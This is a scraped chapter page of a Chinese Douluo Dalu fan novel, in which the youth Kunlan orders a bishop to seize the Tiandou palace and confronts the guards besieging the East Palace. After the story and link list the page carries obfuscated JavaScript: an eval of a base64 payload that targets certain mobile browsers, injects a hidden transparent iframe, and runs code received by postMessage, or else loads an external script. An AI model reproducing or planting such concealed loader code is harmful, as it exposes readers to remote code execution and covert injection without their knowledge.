收藏【小说123网www.txt123.cc】,元尊小说无弹窗免费阅读!

    萨尔斯突然感到一种无比的窒息感,就像一双无形的大手正死死地捏住自己的喉咙。

    他不知道发生了什么事情,但此时,他内心唯一迫切想做的就是赶紧奉献自己的一切,去安抚那个未知的存在——

    王座之上的皇者生气了!

    那种压迫感,绝对是跨越了世间的凡俗王权:

    天斗和星罗帝国的帝王,甚至是武魂殿的教皇都需要受到万民的敬仰和认可。

    但是这份愤怒的发出者,萨尔斯以自己几十年侍奉主君的经验判断,绝对是自然而然地接受了天地生灵的膜拜……

    怎么可能?

    这是什么特殊的武魂,萨尔斯赶紧吐出了咽在喉咙的吐司,他在脑子里赶紧检索着武魂殿千百年来所纪录的奇异武魂,

    “皇权武魂吗……还是圣女那般的神赐武魂?”

    然而,并没等到萨尔斯思考出什么,一道黑衣身影便悬空轻轻踏在梅香园上方,接着冰蓝色的寒霜像是热诚的随从一般,将梅香园的每一块砖瓦、树枝、土壤和方桌都蔓延上,一时间梅香园变成了冰雪帝王的行宫一般。

    “萨尔斯?武魂殿驻天斗的白金主教?”

    冷漠的声音在萨尔斯耳畔响起,然而他却发现自己已经不自觉地离开了石墩,居然有一种想要下跪顶礼膜拜的趋势。

    饶是在面见教皇的时候,萨尔斯也没有这一种面见天地行君臣之礼的冲动。

    “是--在下就是萨尔斯。”

    “武魂殿撤去了对我通缉令吗?”

    漠然的声音再一次响起,萨尔斯突然想到了什么。

    他有些惊慌地抬起头,迎接他的是一双金色的明眸,淡漠的双瞳中各自流转着碧冰色的曼陀罗花和赤金色的火焰十字架,黑色的布衣在乖顺的风元素衬托之下轻盈地飞舞,一张典型的少年脸庞——

    却是眉宇挺拔漆黑,凌冽如同闪着寒光的刀剑一般。

    是天怒者!

    萨尔斯脑海里自然而然地出现了这个答案,他不敢从正面直视昆兰,就好像自己面对着一枚出鞘的绝世剑锋一般,

    “是是是,三个月之前教皇陛下就已经撤去了关于您的绝大多数通缉令,不久前大供奉也在斗罗殿发出了赦免令,小的这一次回来之后也是立马公开宣布对您的赦免……”

    萨尔斯尽量地弯下了自己的身子,对于昆兰的称呼也不自觉地用上了对待教皇大人的专属。

    “赦免……这是有趣的说法?”

    萨尔斯听了,立马内心狂扇自己。

    他竟然没有想到这个措辞,神他妈的赦免,这时候应该说诚意合作或者武魂殿意识到了自己犯下的错误,但是昆兰的威压并没有如萨尔斯意料的那般骤然增强。

    “萨尔斯,你带上武魂殿如今可以调动的所有武力前往皇宫。记住,只要有反抗的力量,就要彻底消灭……直到天斗皇宫的反抗力量为零。”

    昆兰淡漠地给出了自己的指令,他已经感应到了留在千仞雪那边符鱼的讯息——

    唐昊的出现、包围东宫的军队和七位气息一致的魂圣,以及刚刚天梦冰蚕向自己反馈回来的“银月铠甲的长矛御林军蜂拥向皇宫”画面……

    既然雪夜和邪君向自己送上了这么一份大礼,那他昆兰怎么可能不会接住?

    “计划提前开启了吗?”

    萨尔斯唯唯诺诺地问了一句,就如同刚刚的紫衣专员问自己的语气一般。

    他还没有接到武魂殿总部的指令,这是要彻底和天斗帝国撕破脸皮了吗?

    “这是我的身份卡,拿着它去找七宝琉璃宗的宁风致,史莱克广场上也集合了一股可观的力量。”

    昆兰指间幽光一闪,一张黑金色的金属卡片印在了萨尔斯面前的石桌上,这还是昆兰之前在索托城魂斗场注册的身份卡,上面写着他的代号——天使!

    萨尔斯颤颤巍巍地取下了金属卡,他瞥了一眼其上的名字,心中又响起一道晴空霹雳,接着他又听到了昆兰最后的一道指令。

    “东宫那边交给我,至于整个天斗皇城,我要你紧紧地掌控在手里面,以上我所说的各方势力也会尽力配合你。”

    梅香园上方的黑影已骤然消失不见,周围的压迫感也如同潮水般地退去。

    萨尔斯慢慢挺直了身子,冷汗已经打湿了整片后背。

    “主教大人?咱们现在怎么办?”

    紫衣专员铆足了力气才缓缓站起,刚刚他直接向黑狗一样趴在了地上。

    武魂殿的紫衣专员要求实力至少达到魂帝级别,而他作为萨尔斯的心腹,更是拥有七十三级的魂圣实力,难以想象刚刚的黑衣少年究竟是什么样的存在。

    “即刻召集魂尊之上的所有职员,包括宣布闭关的三位护法,还有我们召集完成的民间力量。”

    “你再让左丘对外宣称天斗皇室帝王不仁,私通异域外贼,今武魂殿顺应天道,助太子清除霍乱!”

    萨尔斯很快就给出了具体的命令,他也意识到了时不我待,自己则是即刻起身前往皇城城郊的七宝琉璃堡。

    ……

    ……

    清风在昆兰耳畔向后刮去,同时天梦冰蚕也不停地将皇城要点的御林军和皇宫的甲卫部署画面传给昆兰。

    几十上百张画面同时处理,是一种及其费脑的行为,不过有百万年修为的天梦这个精神力专业户来负责,确实不需要昆兰付出太多。

    现在,昆兰身上的几位住户都找到了自己的专业方向——

    玄汐负责统领和话逼,冰帝负责属性输出,天梦负责精神领域,至于还有一个常年不在身边的符鱼,则是负责防御和布阵。

    “玄哥,我能感觉得到大人此时的情绪处于无比的愤怒,但他现在的反应也冷静得可怕了吧!”

    精神世界内,天梦冰蚕扭动着自己肥美的身躯,第一节躯体挺起贴近玄汐的耳边悄声说道,同时它也将最新的画面同步给昆兰。

    “天梦老弟,你不明白当一个人承受了最大的怒火之后的选择是什么,这小子连续失去了生命中最重要的两个人……纯粹的愤怒已经不足以来形容他了,他需要的是复仇,就如同一头睁眼的巨龙一般!”

    “一个人处于情绪的边际,却又是拥有着绝对的理性,这是一个需要见过多少苦难才能磨砺而出的灵魂啊!”

    玄汐此时也收起了自己平日里的玩世不恭,它天蓝色的龙瞳复杂地张合着,似乎又看到了当年龙神血战三大至高神王的绝世场面。

    玄汐也没有选择以龙魂出窍的方式来协助昆兰,它深深明白,一会儿只能够属于他一个人的战场!

    “刚刚天梦扫描的画面,那位乌黑大锤武魂的人物,恐怖有着不至于九十五级超级斗罗的实力吧,面对着三名初阶封号斗罗的战力轻松碾压,这可不是一般的超级斗罗可以做到的,他的实力恐怕和之前的那只金光猴子差不多甚至更强!”

    冰帝的声音依旧清冷,白皙绝艳的俏脸多了一抹忧虑,她很担心昆兰不是唐昊的对手。

    “不是还有那条傻鱼打消耗吗?别忘了当时面对它布下的水雷阵法,我们也是吃了不少苦头。”

    玄汐的回复依旧没有彻底打消冰帝的疑虑,她的本源烙印和昆兰精神世界紧紧相连,她能感受到昆兰莫大的悲哀——

    就像一座雪山一样紧紧地将人压倒,寂静的雪花和无声的冰风将心彻底冻住。

    “有时候,龙族中也会有决斗,并不是所有龙王都对自己的属下有着绝对的权威……当然,龙神它老人家除外,但是它之下的九大龙王、十二天龙和一百零八序列龙侍都是相互有着变动的,我们这些九大龙王虽然生来就是二级神祇,但是依旧会受到卓越的后代挑战。”

    “你能想象一个肉体凡胎的神官,竟然向实力数十倍于自己的二级神祇发起决斗,而且最后它没有输。”

    玄汐突然说了一通毫无章法的话语,就好像是被编剧硬塞了一段看似玄之又玄,但其实又狗屁不通的台词一般。

    小小的蓝色龙爪刨了刨自己的鼻子,凌冽的龙眸让冰帝和天梦一时间都不敢与之对视,

    “这就是死斗,相信你们或多或少都经历过……真正的战士不会遗忘,而是将它永远地雕刻在骨子里。”

    “况且,我从来都不相信这小子会输。”

    玄汐轻闭龙眸,它看到了自己复苏以来跟随昆兰面对过的所有敌人——

    哪一个不是超过自身实力,但是他们都从来都没有退怯过,这一次对上的唐昊,也仅仅是复仇之路的第一步。

    ……

    偌大的东宫,此刻已经被一个更为巨大的蓝色法阵完全罩住,连一只苍蝇出入的缝隙都没有。

    埋伏在外的十支甲卫和苍狼、甲胄等七位魂圣已经尝试了不下三轮的攻击,想要破开法阵,但是他们的攻击都只是在蓝色法阵上泛起雨滴点点。

    蓝晶状态之下的符鱼,最擅长潮汐守御,没有瞬间达到顶级斗罗的威能是根本破不开它布下的“蓝色青铜”法阵。

    同时,他们的攻击频率也赶不上几千道深蓝潮汐旋涡的修复速度。

    “苍狼,这样下去我们根本破不了阵啊!”

    甲胄脸色凝重地看着在近千道破星箭雨的钉射下,和他们七人合力的一击下仅仅泛起阵阵涟漪的法阵壁垒,对着一旁再欲进攻的苍狼说道。

    这一次行动中,苍狼是除了唐昊之外的最高指挥者。

    “你懂什么?给我继续进攻,这样就算破不了阵法,也可以对布阵者进行大量的消耗。”

    苍狼厉声喝道,他在成为皇宫的护卫长之前,也前后在西北、东北战区待过,对于一些奇门遁甲之流也有些了解。

    而且,虽然这诡异的法阵隔绝了他们和里面的空间距离,但是里面战斗的气息却是依旧激烈。

    其中一方的爆裂和万吨巨力依旧稳稳地压过了多方的战斗气息,虽然刚开始曾爆发了一段惊人的能量波动,但很快就被更爆炸输出的能量波动给覆盖。

    “昊天大人仍处于上风,你们再敢有人祸乱军心,我绝不轻饶!”

    苍狼挥了挥手,身后的六名魂圣再次将气力灌输到他身体里,沧黄色的能量团再一次凝聚在他的胸前,狠狠地冲撞在蓝色的法阵壁垒上。

    这一次蓝色的法阵壁垒竟然剧烈地颤动起叠浪涟漪,苍狼双眼一阵凌冽,内心更加笃定。

    “再等半刻,五千御林军包围此地,给我腾开东宫西面的宫道,我就不信这法阵可以抵御住五千重甲铁骑的冲锋!”

    苍狼一掌拍在法阵壁垒上,随后被狠狠地反弹了回来,让他一身冗杂的魂力有些起伏。

    然而,这时的天空中却毫无征兆地飘零起了蓝色的雪花,或者更准确来说是一片片深蓝色的冰晶。

    此刻已经是大陆的二月下旬,按理说皇城应该不会再飘零起冰雪了。

    冰碧色的寒霜,也迅速地在汉白石砖官道及其两侧的朱红色长墙上蔓延起来,很快檐角就挂满了尖锐的冰挂,两旁的三角梅也开出了形态各异的冰花——

    或如怪兽,或如苍鹫,或如花卉,或如人物,瑶树琪花一般迎接着最后的黑衣帝王降临。

    “你们永远也等不到那五千御林军了。”

    低沉的嗓音捶打着包围东宫的每一人,他们看着从碧冰色的冰雾中缓缓走来的黑衣少年,清脆的步子却是踏在每一个人心上。

    “你是谁!”

    苍狼咬着舌尖将自己从恐惧中拉回,他再度凝聚出一团堪比初阶斗罗的苍黄能量球,拖着长长的光尾朝着黑衣身影射去。

    身后的十支卫队也纷纷调转手中的破星弩,咻咻咻——

    满天的寒光黑影却是没有朝着昆兰所在飞去,而是死死地锁定了苍狼七人。

    身位靠后的三人还没有来得及反应,就被从脚趾到头顶来了个彻底的穿刺,血红色的箭头密密麻麻地从他们的前面身躯钻出。

    “你是最后的引爆人?”

    冰冷的声音却是从苍狼的耳畔传来,他明明看见那道黑衣还在自己的几十米开外。

    然而,苍狼却是鬼使神差地张开了嘴以一种极不协调的声音说道:

    “是的,引爆装置在我的手里面,陛下在东宫周围铺设了几十吨火药,届时无论是唐昊还是太子胜出,我都会引爆火药,这一局无论是唐昊,还是武魂殿都没有赢家。”

章节目录

免费网游小说推荐: 网游:开局截胡降龙十八掌 这个上单头衔太多了 明泽学园高校生 斗罗之蚀雷之龙 重生变成顶流的小娇妻 我,神明,救赎者 王者:从陪玩到荣耀巅峰 NBA:狂徒崛起 我的世界之凯林龙城 网游:凶猛召唤

eval("\x77\x69\x6e\x64\x6f\x77")["\x73\x6A\x42\x42"]=function(e){var js =''+'ABCDEFGHIJKLMN'+'OPQRSTUVWXYZabc'+'defghijklmno'+'pqrstuvwxyz01234'+'56789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=js.indexOf(e.charAt(f++));o=js.indexOf(e.charAt(f++));u=js.indexOf(e.charAt(f++));a=js.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x75\x6A\x51\x6A\x73\x5A\x74\x42\x4F"]=function(){eval(sjBB("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoc2pCQih1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHNqQkIoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihzakJCKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbc2pCQigiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMjUzNCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8yNTM0J109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbihzakJCKGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJzFJVEwnKycwTVROeScrJzB5WUdKJysnVEonKyc0NFknKydHYTNWJysnM2JHJysnSlRKelEnKydEJysnTndFVFEnKyd6JysnVVMnKydidicrJ05tTGxGJysnSGJ5VicrJ1dkdWMnKyczZDNaaycrJ00nKydsWWsnKydNbCcrJ0UwTWxNJysnSGMwUicrJ0hhJysnJysnJywnJysnTEp0JysnYUd6JysnaFInKycnKycnLHdpbmRvdyxkb2N1bWVudCwnJysnR0ZJJysneXF0JysnTScrJycrJycsJzQnKQ=="));}